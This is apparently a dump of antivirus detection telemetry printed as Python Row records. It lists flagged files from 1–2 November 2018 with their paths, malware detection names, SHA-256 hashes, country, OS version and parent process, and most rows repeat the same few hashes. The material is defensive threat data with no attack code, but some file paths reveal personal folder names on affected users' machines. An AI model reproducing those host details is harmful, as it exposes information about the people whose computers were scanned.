  Row(detection=Row(filename='avscan-20181102-060854-bf6be84f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060854-BF6BE84F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055642-0b0054fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055642-0B0054FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba0d4c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA0D4C37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053042-6965effa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053042-6965EFFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-00dd5ac3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-00DD5AC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060021-8da47edd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060021-8DA47EDD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060443-29df0be0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060443-29DF0BE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-39c39fda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-39C39FDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052046-05f9c542', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052046-05F9C542', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055104-417a6174', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055104-417A6174', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3e653e8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3E653E8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053334-cfd77f33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053334-CFD77F33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055451-c8d0319e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055451-C8D0319E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062406-df256dbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062406-DF256DBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054330-32de6065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054330-32DE6065', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062453-faa01c09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062453-FAA01C09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061537-af5946a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061537-AF5946A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050857-5f58971d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050857-5F58971D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050654-15dae41b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050654-15DAE41B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053438-f5fb9309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053438-F5FB9309', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055854-59cfd75d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055854-59CFD75D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062602-24208bd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062602-24208BD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051751-9db9a2bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051751-9DB9A2BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050514-da50a5eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050514-DA50A5EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='753be2f971e1893bf0e8f3097643b1e6e424d2309a4f09efb9baef7c46e56f42', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T06:52:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053517-0d410a98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053517-0D410A98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051728-9026578b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051728-9026578B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060758-9ddccaa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060758-9DDCCAA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vncviewer.exe', filepath='e:\\users\\X\\desktop\\megared gml\\archivos de programa\\ultravnc\\vncviewer.exe', filesize=1024000, name='TR/Vundo.Gen7.#M300.#R600162'), hash='890a0dd467657d5ffa711c3bfabdb963d2f8398fca02af7d3a00186f2aab31f5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060752-9a6fc6ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060752-9A6FC6EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062308-bc17330e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062308-BC17330E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='argent.vir', filepath='C:\\Program Files (x86)\\Shirl\\argent.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='101msdcf.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\101MSDCF\\101MSDCF.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3b58968ace2221c198fc27a603e9be8a9e8d8d2f4b9a59e450602286a87ad694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-27-27.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T02:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T04:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winbox.exe', filepath='H:\\شغل 2015\\winbox.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='51a3fcbf15e5376f577bfd3f6c7cf63ef31bea5864a277dea09834642b504d45', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:42:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154737-6cffd642', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154737-6CFFD642', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sore.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\JUL01\\SORE\\SORE.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='misc.exe', filepath='E:\\MISC\\MISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155640-c87178b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155640-C87178B6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:32:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:06:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143301-7b463cd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143301-7B463CD3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155508-b8fc8562', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155508-B8FC8562', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160302-08e3ad28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160302-08E3AD28', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsystem volume information.exe', filepath='E:\\gSystem Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:46:51Z'), dt=datetime.date(2018, 11, 1)),
